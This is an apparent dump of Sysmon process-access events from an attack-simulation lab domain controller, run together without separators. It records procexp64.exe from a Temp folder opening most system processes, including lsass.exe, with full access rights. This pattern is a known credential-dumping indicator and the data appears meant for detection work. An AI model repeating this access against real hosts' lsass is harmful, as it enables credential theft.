15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788911Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788910Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788909Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788908Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788907Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788906Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788905Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788904Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788903Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788902Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788901Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788900Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788899Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788898Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788897Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788896Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788895Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788894Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788893Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788892Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788891Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788890Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788889Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788888Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788887Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789010Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.111{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789009Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.111{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789008Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789007Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789006Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789005Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789004Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789003Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789002Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789001Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789000Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788999Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 